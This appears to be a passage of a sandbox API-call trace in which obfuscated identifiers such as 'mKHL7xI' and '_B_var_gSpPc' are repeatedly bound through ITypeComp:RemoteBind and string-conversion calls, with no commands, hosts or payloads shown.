0x18460101 [0060.767] ITypeComp:RemoteBind (in: This=0x87ce890, szName="mKHL7xI", lHashVal=0x109dfd, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x512 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x512) returned 0x0 [0060.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372da6, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="mKHL7xI") returned 8 [0060.767] ITypeComp:RemoteBind (in: This=0x87ce668, szName="mKHL7xI", lHashVal=0x109dfd, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x512 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x512) returned 0x0 [0060.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372da6, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="mKHL7xI") returned 8 [0060.767] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="mKHL7xI", lHashVal=0x109dfd, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x512 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x512) returned 0x0 [0060.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372da6, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="mKHL7xI") returned 8 [0060.768] ITypeComp:RemoteBind (in: This=0x87cef08, szName="mKHL7xI", lHashVal=0x109dfd, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x512 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x512) returned 0x0 [0060.768] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.768] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x5372da6 | out: _Dst=0x87fcbd8) returned 0x0 [0060.769] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea06ce, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_mKHL7xI") returned 15 [0060.769] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_mKHL7xI", lHashVal=0x10a181, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.769] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5372da6 | out: _Dst=0x343ddc) returned 0x0 [0060.769] CRetailMalloc_Free () returned 0x7670201 [0060.769] ITypeComp:RemoteBind (in: This=0x87ce890, szName="Vc0PXIYUB", lHashVal=0x10256b, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x514 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x514) returned 0x0 [0060.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372dca, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="Vc0PXIYUB") returned 10 [0060.769] ITypeComp:RemoteBind (in: This=0x87ce668, szName="Vc0PXIYUB", lHashVal=0x10256b, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x514 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x514) returned 0x0 [0060.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372dca, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="Vc0PXIYUB") returned 10 [0060.770] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="Vc0PXIYUB", lHashVal=0x10256b, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x514 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x514) returned 0x0 [0060.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372dca, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="Vc0PXIYUB") returned 10 [0060.770] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Vc0PXIYUB", lHashVal=0x10256b, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x514 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x514) returned 0x0 [0060.770] CRetailMalloc_Alloc () returned 0x874fba0 [0060.770] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5372dca | out: _Dst=0x874fba0) returned 0x0 [0060.771] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea06fa, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_Vc0PXIYUB") returned 17 [0060.771] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Vc0PXIYUB", lHashVal=0x102eb0, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.771] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5372dca | out: _Dst=0x343ddc) returned 0x0 [0060.771] CRetailMalloc_Free () returned 0x18460101 [0060.771] ITypeComp:RemoteBind (in: This=0x87ce890, szName="gSpPc", lHashVal=0x10ba19, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x516 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x516) returned 0x0 [0060.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372df2, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="gSpPc") returned 6 [0060.772] ITypeComp:RemoteBind (in: This=0x87ce668, szName="gSpPc", lHashVal=0x10ba19, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x516 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x516) returned 0x0 [0060.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372df2, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="gSpPc") returned 6 [0060.772] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="gSpPc", lHashVal=0x10ba19, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x516 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x516) returned 0x0 [0060.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372df2, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="gSpPc") returned 6 [0060.773] ITypeComp:RemoteBind (in: This=0x87cef08, szName="gSpPc", lHashVal=0x10ba19, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x516 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x516) returned 0x0 [0060.773] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.773] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x6, _Src=0x5372df2 | out: _Dst=0x87fcbd8) returned 0x0 [0060.773] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea072a, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_gSpPc") returned 13 [0060.773] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_gSpPc", lHashVal=0x107e06, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.773] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5372df2 | out: _Dst=0x343ddc) returned 0x0 [0060.774] CRetailMalloc_Free () returned 0x7670201 [0060.774] ITypeComp:RemoteBind (in: This=0x87ce890, szName="UptUOgG", lHashVal=0x105522, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x518 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x518) returned 0x0 [0060.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e16, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="UptUOgG") returned 8 [0060.774] ITypeComp:RemoteBind (in: This=0x87ce668, szName="UptUOgG", lHashVal=0x105522, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x518 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x518) returned 0x0 [0060.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e16, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="UptUOgG") returned 8 [0060.774] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="UptUOgG", lHashVal=0x105522, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x518 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x518) returned 0x0 [0060.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e16, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="UptUOgG") returned 8 [0060.775] ITypeComp:RemoteBind (in: This=0x87cef08, szName="UptUOgG", lHashVal=0x105522, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x518 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x518) returned 0x0 [0060.775] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.775] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x5372e16 | out: _Dst=0x87fcbd8) returned 0x0 [0060.775] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0756, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_UptUOgG") returned 15 [0060.776] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_UptUOgG", lHashVal=0x104925, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.794] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5372e16 | out: _Dst=0x343ddc) returned 0x0 [0060.794] CRetailMalloc_Free () returned 0x7730201 [0060.794] ITypeComp:RemoteBind (in: This=0x87ce890, szName="vCkASdp", lHashVal=0x10e8a3, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x51a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x51a) returned 0x0 [0060.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e3a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="vCkASdp") returned 8 [0060.795] ITypeComp:RemoteBind (in: This=0x87ce668, szName="vCkASdp", lHashVal=0x10e8a3, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x51a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x51a) returned 0x0 [0060.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e3a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="vCkASdp") returned 8 [0060.795] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="vCkASdp", lHashVal=0x10e8a3, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x51a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x51a) returned 0x0 [0060.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e3a, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="vCkASdp") returned 8 [0060.796] ITypeComp:RemoteBind (in: This=0x87cef08, szName="vCkASdp", lHashVal=0x10e8a3, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x51a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x51a) returned 0x0 [0060.796] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.796] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x5372e3a | out: _Dst=0x87fcbd8) returned 0x0 [0060.796] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0782, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_vCkASdp") returned 15 [0060.796] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_vCkASdp", lHashVal=0x10ec27, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.796] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5372e3a | out: _Dst=0x343ddc) returned 0x0 [0060.797] CRetailMalloc_Free () returned 0x7730201 [0060.797] ITypeComp:RemoteBind (in: This=0x87ce890, szName="EFqonfS", lHashVal=0x10286d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x51c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x51c) returned 0x0 [0060.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e5e, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="EFqonfS") returned 8 [0060.797] ITypeComp:RemoteBind (in: This=0x87ce668, szName="EFqonfS", lHashVal=0x10286d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x51c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x51c) returned 0x0 [0060.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e5e, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="EFqonfS") returned 8 [0060.797] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="EFqonfS", lHashVal=0x10286d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x51c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x51c) returned 0x0 [0060.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e5e, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="EFqonfS") returned 8 [0060.798] ITypeComp:RemoteBind (in: This=0x87cef08, szName="EFqonfS", lHashVal=0x10286d, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x51c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x51c) returned 0x0 [0060.798] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.798] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x8, _Src=0x5372e5e | out: _Dst=0x87fcbd8) returned 0x0 [0060.798] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea07ae, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_EFqonfS") returned 15 [0060.799] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_EFqonfS", lHashVal=0x102bf1, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.799] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5372e5e | out: _Dst=0x343ddc) returned 0x0 [0060.799] CRetailMalloc_Free () returned 0x7730201 [0060.799] ITypeComp:RemoteBind (in: This=0x87ce890, szName="KVtZUl", lHashVal=0x1065c1, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x51e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x51e) returned 0x0 [0060.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e82, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="KVtZUl") returned 7 [0060.799] ITypeComp:RemoteBind (in: This=0x87ce668, szName="KVtZUl", lHashVal=0x1065c1, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x51e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x51e) returned 0x0 [0060.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e82, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="KVtZUl") returned 7 [0060.799] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="KVtZUl", lHashVal=0x1065c1, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x51e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x51e) returned 0x0 [0060.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372e82, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="KVtZUl") returned 7 [0060.800] ITypeComp:RemoteBind (in: This=0x87cef08, szName="KVtZUl", lHashVal=0x1065c1, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x51e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x51e) returned 0x0 [0060.800] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.800] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x7, _Src=0x5372e82 | out: _Dst=0x87fcbd8) returned 0x0 [0060.801] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea07da, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_KVtZUl") returned 14 [0060.801] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_KVtZUl", lHashVal=0x10e06a, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.801] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5372e82 | out: _Dst=0x343ddc) returned 0x0 [0060.801] CRetailMalloc_Free () returned 0x7730201 [0060.801] ITypeComp:RemoteBind (in: This=0x87ce890, szName="lM0aBGyA", lHashVal=0x10d110, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x522 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x522) returned 0x0 [0060.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372eca, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="lM0aBGyA") returned 9 [0060.801] ITypeComp:RemoteBind (in: This=0x87ce668, szName="lM0aBGyA", lHashVal=0x10d110, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x522 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x522) returned 0x0 [0060.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372eca, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="lM0aBGyA") returned 9 [0060.801] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="lM0aBGyA", lHashVal=0x10d110, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x522 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x522) returned 0x0 [0060.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372eca, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="lM0aBGyA") returned 9 [0060.802] ITypeComp:RemoteBind (in: This=0x87cef08, szName="lM0aBGyA", lHashVal=0x10d110, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x522 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x522) returned 0x0 [0060.802] CRetailMalloc_Alloc () returned 0x87fcbd8 [0060.802] _mbscpy_s (in: _Dst=0x87fcbd8, _DstSizeInBytes=0x9, _Src=0x5372eca | out: _Dst=0x87fcbd8) returned 0x0 [0060.803] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea0806, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_lM0aBGyA") returned 16 [0060.803] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_lM0aBGyA", lHashVal=0x10a899, wFlags=0x3, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, 